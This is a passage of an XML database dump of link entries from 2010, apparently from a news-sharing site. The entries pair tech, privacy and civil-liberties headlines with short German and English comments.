&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/07/05/tax_scam_rebate/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/06/online-tax-scam-gang-get-40-years-the-register.png</field><field type="SlugField" name="slug">online-tax-scam-gang-get-40-years-the-register</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-06 10:33:54</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">scam</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="271" model="submitter.newsentry"><field type="CharField" name="title">Another Apple iPhone 4 Flaw: A Glitchy Proximity Sensor - PCWorld</field><field type="TextField" name="excerpt">Another "glitch" of Mr. Perfect's new toy.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Another "glitch" of Mr. Perfect's new toy.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.pcworld.com/article/200024/another_apple_iphone_4_flaw_a_glitchy_proximity_sensor.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/06/another-apple-iphone-4-flaw-a-glitchy-proximity-s.png</field><field type="SlugField" name="slug">another-apple-iphone-4-flaw-a-glitchy-proximity-s</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-06 10:15:15</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">apple iphone</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="270" model="submitter.newsentry"><field type="CharField" name="title">Hacker forced to cancel HiTB presentation due to legal threats by ATM vendors - ByteMods.com</field><field type="TextField" name="excerpt">Security by Obscurity always worked. Ha ha har</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Security by Obscurity always worked. Ha ha har
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.bytemods.com/news/201/hacker-forced-to-cancel-hitb-presentation-due-to-legal-threats-by-atm-vendors</field><field type="FileField" name="page_screenshot">page_shots/2010/07/04/hacker-forced-to-cancel-hitb-presentation-due-to-l.png</field><field type="SlugField" name="slug">hacker-forced-to-cancel-hitb-presentation-due-to-l</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-04 18:36:28</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">legal</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="269" model="submitter.newsentry"><field type="CharField" name="title">App Store, Hacked. (Updated)</field><field type="TextField" name="excerpt">Mal gucken ob das stimmt. Angeblich Ranking im App-Store gepusht und iTunes Accounts gehackt.
[Typ ist raus geflogen](http://www.pcworld.com/businesscenter/article/200503/apps_disappear_from_app_store_amid_hacking_complaints.html)</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Mal gucken ob das stimmt. Angeblich Ranking im App-Store gepusht und iTunes Accounts gehackt.
&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.pcworld.com/businesscenter/article/200503/apps_disappear_from_app_store_amid_hacking_complaints.html"&gt;Typ ist raus geflogen&lt;/a&gt;
&lt;/p&gt;</field><field type="CharField" name="external_url">http://thenextweb.com/apple/2010/07/04/app-store-hacked/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/06/app-store-hacked-updated_.png</field><field type="SlugField" name="slug">app-store-hacked-updated</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-04 18:28:36</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">apple itunes</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="10"></object></field></object><object pk="268" model="submitter.newsentry"><field type="CharField" name="title">ZGeek - We put the "M" in stupid - Comedy Central censors Futurama's jab at Apple</field><field type="TextField" name="excerpt">Last night's episode took aim at discarded technology being dumped in third-world countries, Twitter, and our favorite company Apple. It was brilliant satire and it's refreshing to have that voice on TV again.
During the broadcast, as the zombies entered the Mom store there is voiceover from the Mom character that is met with cheers from the crowd. She says, "Introducing the all new eyePhone 2.0."
In the online clip from the show, the dialogue is missing. Instead the zombies just began cheering, money in hand for no apparent reason. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Last night's episode took aim at discarded technology being dumped in third-world countries, Twitter, and our favorite company Apple. It was brilliant satire and it's refreshing to have that voice on TV again.
&lt;/p&gt;
&lt;p&gt;During the broadcast, as the zombies entered the Mom store there is voiceover from the Mom character that is met with cheers from the crowd. She says, "Introducing the all new eyePhone 2.0."
&lt;/p&gt;
&lt;p&gt;In the online clip from the show, the dialogue is missing. Instead the zombies just began cheering, money in hand for no apparent reason.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.zgeek.com/content.php/3191-Comedy-Central-censors-Futurama-s-jab-at-Apple</field><field type="FileField" name="page_screenshot">page_shots/2010/07/04/no_page_shot.png</field><field type="SlugField" name="slug">zgeek-we-put-the-m-in-stupid-comedy-central</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-04 01:13:48</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">apple iphone</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object><object pk="7"></object></field></object><object pk="267" model="submitter.newsentry"><field type="CharField" name="title">Little Spiderman uses vacuum cleaners to climb buildings, win the hearts of the ladies -- Engadget</field><field type="TextField" name="excerpt">Typ klettert mit einem Staubsauger die Wände hoch. Spiderman</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Typ klettert mit einem Staubsauger die Wände hoch. Spiderman
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.engadget.com/2010/07/01/little-spiderman-uses-vacuum-cleaners-to-climb-buildings-win-th/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/02/little-spiderman-uses-vacuum-cleaners-to-climb-bui.png</field><field type="SlugField" name="slug">little-spiderman-uses-vacuum-cleaners-to-climb-bui</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-02 15:29:58</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">spiderman vaccum</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="266" model="submitter.newsentry"><field type="CharField" name="title">Foursquare cared a lot more about $20M than your privacy</field><field type="TextField" name="excerpt">Ryan Singel at Wired News has been covering the story of reported breaches of privacy for Foursquare users, and the company's horrible (and horribly slow) response to the matter. It all started on June 20, when the startup received an unsolicited message from a white-hat hacker: it was leaking user data on a massive scale, and violating its own privacy policy.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Ryan Singel at Wired News has been covering the story of reported breaches of privacy for Foursquare users, and the company's horrible (and horribly slow) response to the matter. It all started on June 20, when the startup received an unsolicited message from a white-hat hacker: it was leaking user data on a massive scale, and violating its own privacy policy.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.wired.com/threatlevel/2010/06/foursquare-privacy-funding/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/02/foursquare-cared-a-lot-more-about-20m-than-your-p.png</field><field type="SlugField" name="slug">foursquare-cared-a-lot-more-about-20m-than-your-p</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-02 14:50:54</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">online, privacy, social network</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object><object pk="10"></object></field></object><object pk="265" model="submitter.newsentry"><field type="CharField" name="title">letzte 2 Space Shuttle Fluege</field><field type="TextField" name="excerpt">Die letzten zwei Flüge:
Nov. 1 for space shuttle Discovery's STS-133 mission.
Feb. 26, 2011, for the liftoff of shuttle Endeavour's STS-134 mission.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Die letzten zwei Flüge:
&lt;/p&gt;
&lt;p&gt;Nov. 1 for space shuttle Discovery's STS-133 mission.
Feb. 26, 2011, for the liftoff of shuttle Endeavour's STS-134 mission.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.networkworld.com/community/node/63156</field><field type="FileField" name="page_screenshot">page_shots/2010/07/01/unknown-title001_.png</field><field type="SlugField" name="slug">unknown-title001</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-01 20:36:02</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">nasa shuttle</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="264" model="submitter.newsentry"><field type="CharField" name="title">Bkis Blog &amp;raquo; Adobe fix still allows &amp;#8220;Escape from PDF&amp;#8221;</field><field type="TextField" name="excerpt">Die haben es echt nicht im Griff. Nach so langer Zeit taugt der Fix nix.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Die haben es echt nicht im Griff. Nach so langer Zeit taugt der Fix nix.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://blog.bkis.com/en/adobe-fix-still-allows-escape-from-pdf/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/01/bkis-blog-raquo-adobe-fix-still-allows-8220es.png</field><field type="SlugField" name="slug">bkis-blog-raquo-adobe-fix-still-allows-8220es</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-01 15:08:59</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">adobe pdf</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="263" model="submitter.newsentry"><field type="CharField" name="title">Google: Flash stays on YouTube, and here's why • The Register</field><field type="TextField" name="excerpt">Google is pulling back from WebM - or at least cont' to have Flash as their #1. Stupid politics.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Google is pulling back from WebM - or at least cont' to have Flash as their #1. Stupid politics.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/06/30/why_youtube_still_uses_flash/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/01/google-flash-stays-on-youtube-and-heres-why-t.png</field><field type="SlugField" name="slug">google-flash-stays-on-youtube-and-heres-why-t</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-01 14:55:18</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">flash google vp8</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="262" model="submitter.newsentry"><field type="CharField" name="title">Russian spy ring bust uncovers tech toolkit • The Register</field><field type="TextField" name="excerpt">Ad-Hoc WiFi and steganography are the tools of Russian spys</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Ad-Hoc WiFi and steganography are the tools of Russian spys
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/06/29/spy_ring_tech/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/01/russian-spy-ring-bust-uncovers-tech-toolkit-the.png</field><field type="SlugField" name="slug">russian-spy-ring-bust-uncovers-tech-toolkit-the</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-01 14:47:58</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">russia spy</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"></field></object><object pk="261" model="submitter.newsentry"><field type="CharField" name="title">Nokia snaffles user data on the down-low • The Register</field><field type="TextField" name="excerpt">Zwangssubscription bei Nokia n900</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Zwangssubscription bei Nokia n900
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/07/01/nokia_n900_update/</field><field type="FileField" name="page_screenshot">page_shots/2010/07/01/nokia-snaffles-user-data-on-the-down-low-the-reg.png</field><field type="SlugField" name="slug">nokia-snaffles-user-data-on-the-down-low-the-reg</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-01 13:56:48</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">n900 nokia</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="260" model="submitter.newsentry"><field type="CharField" name="title">heise online - Geolocatoren werden zum Datenschutzproblem</field><field type="TextField" name="excerpt">Obwohl der Geolocation-Dienst Foursquare den Aufenthaltsort eines Anwenders nur seinen Freunden verraten sollte, ließ sich durch permanente Überwachung von Standorten mit Skripten rekonsturieren, wer sich wann wo aufhielt. Der Entwickler Jesper Andersen hatte mit einem Skript auf diese Weise im Raum San Francisco fast 900.000 sogenannte Check-ins von Personen zu Orten zuordnen können</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Obwohl der Geolocation-Dienst Foursquare den Aufenthaltsort eines Anwenders nur seinen Freunden verraten sollte, ließ sich durch permanente Überwachung von Standorten mit Skripten rekonsturieren, wer sich wann wo aufhielt. Der Entwickler Jesper Andersen hatte mit einem Skript auf diese Weise im Raum San Francisco fast 900.000 sogenannte Check-ins von Personen zu Orten zuordnen können
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Geolocatoren-werden-zum-Datenschutzproblem-1031799.html</field><field type="FileField" name="page_screenshot">page_shots/2010/07/01/heise-online-geolocatoren-werden-zum-datenschutz.png</field><field type="SlugField" name="slug">heise-online-geolocatoren-werden-zum-datenschutz</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-07-01 13:52:22</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">foursquare geo</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="259" model="submitter.newsentry"><field type="CharField" name="title">Jobs at Apple: Antenna designer</field><field type="TextField" name="excerpt">Jetzt suchen sie Antennen-Leute...</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Jetzt suchen sie Antennen-Leute...
&lt;/p&gt;</field><field type="CharField" name="external_url">http://jobs.apple.com/index.ajs?BID=1&amp;method=mExternal.showJob&amp;RID=55852</field><field type="FileField" name="page_screenshot">page_shots/2010/06/30/apple-jobs-at-apple-job-description_.png</field><field type="SlugField" name="slug">apple-jobs-at-apple-job-description</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-30 18:02:00</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">antenna apple</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="258" model="submitter.newsentry"><field type="CharField" name="title">Oklahoma police tase an 86-year-old bedridden grandmother</field><field type="TextField" name="excerpt">When Lonnie Tinsley's 86-year-old bedridden grandmother refused to take her medicine, he called emergency services in El Reno, Oklahoma and requested a medical technician. Instead, a dozen armed officers arrived at the scene.
According to officer Durans official report, Mrs Vernon had taken an 'aggressive posture' in her hospital bed. In order to ensure 'officer safety', one of his men 'stepped on her oxygen hose until she began to suffer oxygen deprivation'. Another of the officers then shot her with a taser, but the connection wasnt solid. A second fired his taser, 'striking her to the left of the midline of her upper chest, and applied high voltage, causing burns to her chest, extreme pain', and unconsciousness. Lona was then handcuffed with sufficient ruthlessness to tear the soft flesh of her forearms, causing her to bleed. After her wounds were treated at a local hospital, Lona was confined for six days in the psychiatric ward at the insistence of the El Reno Police Department.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;When Lonnie Tinsley's 86-year-old bedridden grandmother refused to take her medicine, he called emergency services in El Reno, Oklahoma and requested a medical technician. Instead, a dozen armed officers arrived at the scene.
According to officer Durans official report, Mrs Vernon had taken an 'aggressive posture' in her hospital bed. In order to ensure 'officer safety', one of his men 'stepped on her oxygen hose until she began to suffer oxygen deprivation'. Another of the officers then shot her with a taser, but the connection wasnt solid. A second fired his taser, 'striking her to the left of the midline of her upper chest, and applied high voltage, causing burns to her chest, extreme pain', and unconsciousness. Lona was then handcuffed with sufficient ruthlessness to tear the soft flesh of her forearms, causing her to bleed. After her wounds were treated at a local hospital, Lona was confined for six days in the psychiatric ward at the insistence of the El Reno Police Department.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.dailymail.co.uk/news/worldnews/article-1289780/Dont-taze-granny-American-police-accused-using-Taser-86-year-old-bed-ridden-grandmother.html</field><field type="FileField" name="page_screenshot">page_shots/2010/06/29/oklahoma-police-tase-an-86-year-old-bedridden-gran.png</field><field type="SlugField" name="slug">oklahoma-police-tase-an-86-year-old-bedridden-gran</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-29 10:49:45</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">abuse macht missbrauch nonlethal police taser waffe</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="7"></object></field></object><object pk="257" model="submitter.newsentry"><field type="CharField" name="title">Toronto's secret ID law used to arrest G20 protestor</field><field type="TextField" name="excerpt">In Canada you're not required to show ID. Except if you're in the 'G20 Zone'. You see, the law allows an exemption to the 'show ID' principle for public works. These are usually things like power stations, dams, etc. Well, the government got clever and just declared the entire area a 'public work' so police can go around demanding ID. The best part of this? The law that made this happen won't even be PUBLISHED until after the G20 is over. So nobody knew about it until the cops arrested someone.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;In Canada you're not required to show ID. Except if you're in the 'G20 Zone'. You see, the law allows an exemption to the 'show ID' principle for public works. These are usually things like power stations, dams, etc. Well, the government got clever and just declared the entire area a 'public work' so police can go around demanding ID. The best part of this? The law that made this happen won't even be PUBLISHED until after the G20 is over. So nobody knew about it until the cops arrested someone.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.thestar.com/news/gta/torontog20summit/article/828372--man-arrested-and-left-in-wire-cage-under-new-g20-law</field><field type="FileField" name="page_screenshot">page_shots/2010/06/26/torontos-secret-id-law-used-to-arrest-g20-protest.png</field><field type="SlugField" name="slug">torontos-secret-id-law-used-to-arrest-g20-protest</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-26 01:41:52</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">id, law, law enforcement, politics, terror</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="256" model="submitter.newsentry"><field type="CharField" name="title">Young people, risky behavior and the net: the facts</field><field type="TextField" name="excerpt">danah boyd and Samantha Biegler have released a draft literature review on "Risky Behaviors and Online Safety," commissioned by Harvard's Berkman Center for Internet &amp; Society. It looks at the latest papers on the risks presented to young people by using the Internet; if you've been reading the newspapers, the distance between the reality and what you've heard in the sensationalist accounts of pedos, cyberbullies, etc, will surprise.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;danah boyd and Samantha Biegler have released a draft literature review on "Risky Behaviors and Online Safety," commissioned by Harvard's Berkman Center for Internet &amp;amp; Society. It looks at the latest papers on the risks presented to young people by using the Internet; if you've been reading the newspapers, the distance between the reality and what you've heard in the sensationalist accounts of pedos, cyberbullies, etc, will surprise.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.zephoria.org/thoughts/archives/2010/06/24/risky-behaviors-and-online-safety-a-2010-literature-review.html</field><field type="FileField" name="page_screenshot">page_shots/2010/06/25/young-people-risky-behavior-and-the-net-the-fact_.png</field><field type="SlugField" name="slug">young-people-risky-behavior-and-the-net-the-fact</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-25 16:50:32</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">freedom internetausdrucker internetsperren media online</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="255" model="submitter.newsentry"><field type="CharField" name="title">Regwall cuts The Times's online readership in half</field><field type="TextField" name="excerpt">Rupert Murdoch's Times newspaper has instituted a registration wall as a preliminary step toward a full-blown paywall. Readership of the online edition immediately dropped by 50%. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Rupert Murdoch's Times newspaper has instituted a registration wall as a preliminary step toward a full-blown paywall. Readership of the online edition immediately dropped by 50%.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/media/news/2010/06/incipient-paywall-costing-newspaper-online-readers.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/06/26/httpwwwboingboingnet20100624regwall-cuts.png</field><field type="SlugField" name="slug">httpwwwboingboingnet20100624regwall-cuts</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-25 16:46:49</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">copyright newspaper online payment, imaginary property</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object><object pk="7"></object></field></object><object pk="254" model="submitter.newsentry"><field type="CharField" name="title">EU secretly pushing to put kids in jail for sharing music: ACTA leak</field><field type="TextField" name="excerpt">"The ACTA agreement, by its opacity and undemocratic nature, allows criminal sanctions to be simply negotiated. The leaked document shows that the EU Member States are willing to impose prison sanctions for non-commercial usages of copyrighted works on the Internet as well as for 'inciting and aiding', a notion so broad that it could cover any Internet service or speech questioning copyright policies. EU citizens should interrogate their governments about their support to policies that obviously attack freedom of speech, privacy and innovation. Around the next round of negotiations and beyond, ACTA should be restlessly combatted and opposed worldwide." concludes Jérémie Zimmermann, spokesperson for citizen advocacy group La Quadrature du Net. That means putting kids in jail for trading music with one another. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;"The ACTA agreement, by its opacity and undemocratic nature, allows criminal sanctions to be simply negotiated. The leaked document shows that the EU Member States are willing to impose prison sanctions for non-commercial usages of copyrighted works on the Internet as well as for 'inciting and aiding', a notion so broad that it could cover any Internet service or speech questioning copyright policies. EU citizens should interrogate their governments about their support to policies that obviously attack freedom of speech, privacy and innovation. Around the next round of negotiations and beyond, ACTA should be restlessly combatted and opposed worldwide." concludes Jérémie Zimmermann, spokesperson for citizen advocacy group La Quadrature du Net. That means putting kids in jail for trading music with one another.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.laquadrature.net/en/leak-eu-pushes-for-criminalizing-non-commercial-usages-in-acta</field><field type="FileField" name="page_screenshot">page_shots/2010/06/26/eu-secretly-pushing-to-put-kids-in-jail-for-sharin.png</field><field type="SlugField" name="slug">eu-secretly-pushing-to-put-kids-in-jail-for-sharin</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-25 16:44:55</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">acta, eu, file sharing, free speech, imaginary property</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="253" model="submitter.newsentry"><field type="CharField" name="title">Frankreich: Bewährungsstrafe für Twitter-Hacker | tagesschau.de</field><field type="TextField" name="excerpt">Ein Franzose, der die Twitter-Konten von US-Präsident Barack Obama und der Sängerin Britney Spears geknackt hat, muss nicht ins Gefängnis. Ein Gericht in Clermont-Ferrand verurteilte den "Hacker-Croll" genannten Mann zu fünf Monaten Haft auf Bewährung.
Im Prozess hatte der Arbeitslose bestritten, ein Hacker zu sein. Er habe nie ein Konto verändert oder sonst etwas Böses getan, sagte er. Er habe Sicherheitslücken beim Kurzmitteilungsdienst Twitter aufgedeckt.
# Passwort von Twitter-Mitarbeiter geknackt
Die vom FBI alarmierten französischen Fahnder waren "Hacker-Croll" schnell auf die Schliche gekommen. Um die Twitter-Konten zu knacken, hatte der Mann via Internet private Informationen über Twitter-Mitarbeiter gesammelt und daraus auf ihre E-Mail-Passwörter geschlossen. Bei einem hatte er Erfolg und konnte sich auf dessen Seite einloggen. In den Mails des Mannes fand er dann Hinweise darauf, wie er sich als Administrator-Zugang zu Twitter-Nutzerkonten verschaffen konnte.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Ein Franzose, der die Twitter-Konten von US-Präsident Barack Obama und der Sängerin Britney Spears geknackt hat, muss nicht ins Gefängnis. Ein Gericht in Clermont-Ferrand verurteilte den "Hacker-Croll" genannten Mann zu fünf Monaten Haft auf Bewährung.
&lt;/p&gt;
&lt;p&gt;Im Prozess hatte der Arbeitslose bestritten, ein Hacker zu sein. Er habe nie ein Konto verändert oder sonst etwas Böses getan, sagte er. Er habe Sicherheitslücken beim Kurzmitteilungsdienst Twitter aufgedeckt.
&lt;/p&gt;
&lt;h1&gt;Passwort von Twitter-Mitarbeiter geknackt&lt;/h1&gt;
&lt;p&gt;Die vom FBI alarmierten französischen Fahnder waren "Hacker-Croll" schnell auf die Schliche gekommen. Um die Twitter-Konten zu knacken, hatte der Mann via Internet private Informationen über Twitter-Mitarbeiter gesammelt und daraus auf ihre E-Mail-Passwörter geschlossen. Bei einem hatte er Erfolg und konnte sich auf dessen Seite einloggen. In den Mails des Mannes fand er dann Hinweise darauf, wie er sich als Administrator-Zugang zu Twitter-Nutzerkonten verschaffen konnte.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.tagesschau.de/ausland/twitterurteil100.html</field><field type="FileField" name="page_screenshot">page_shots/2010/06/24/frankreich-bewahrungsstrafe-fur-twitter-hacker.png</field><field type="SlugField" name="slug">frankreich-bewahrungsstrafe-fur-twitter-hacker</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-06-24 23:45:06</field><field to="show.pentashow" name="show" rel="ManyToOneRel">5</field><field type="CharField" name="tags_string">hack twitter</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="252" model="submitter.newsentry"><field type="CharField" name="title">Does Uncle Sam really need 1,100 data centers?</field><field type="TextField" name="excerpt">US gov has 1.100 data centers</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" 